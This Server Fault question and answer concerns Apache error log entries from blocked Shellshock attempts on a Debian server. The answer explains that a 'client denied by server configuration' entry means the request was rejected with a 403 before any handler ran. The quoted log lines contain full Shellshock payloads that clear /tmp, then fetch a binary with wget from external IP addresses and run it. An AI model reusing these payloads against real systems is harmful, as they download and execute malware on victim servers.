Should I worry about requests that get – client denied by server configuration, apache logs

dav asked:

I have a server with debian 7. I was checking the apache error log file and saw a few lines like this

[Fri Mar 20 04:56:48 2015] [error] [client 222.66.95.253] client denied by server configuration: /home/username/www/, referer: () { :; }; /bin/bash -c "rm -rf /tmp/*;echo wget http://61.160.212.172:911/java -O /tmp/China.Z-bbce >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-bbce >> /tmp/Run.sh;echo /tmp/China.Z-bbce >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh"

[Mon Mar 16 16:58:15 2015] [error] [client 210.35.74.116] client denied by server configuration: /home/username/www/, referer: () { :; }; /bin/bash -c "rm -rf /tmp/*;echo wget http://61.180.31.43:9574/xudpASD -O /tmp/China.Z-wwyyxb0 >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-wwyyxb0 >> /tmp/Run.sh;echo /tmp/China.Z-wwyyxb0 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh"

I might be mistaken, but because of this part () { :; }; I think someone was trying to use the shellshock bug.

But independent from whether this is shellshock or not, the question is – if I have lines in logs with message

client denied by server configuration

is this smth that I should worry about, or because the request was declined I can ignore it – being sure that no malicious scripts were downloaded/executed ?

My answer:


“Client denied by server configuration” means that the request was blocked by a Require directive (or in older versions of Apache, the Allow/Deny directives), by a rewrite rule, or by some other Apache module. In particular it means the request was never passed on to an external handler, so the exploit could not have a chance to run. The client was just immediately served a 403 Forbidden error.


View the full question and answer on Server Fault.

Creative Commons License
This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 Unported License.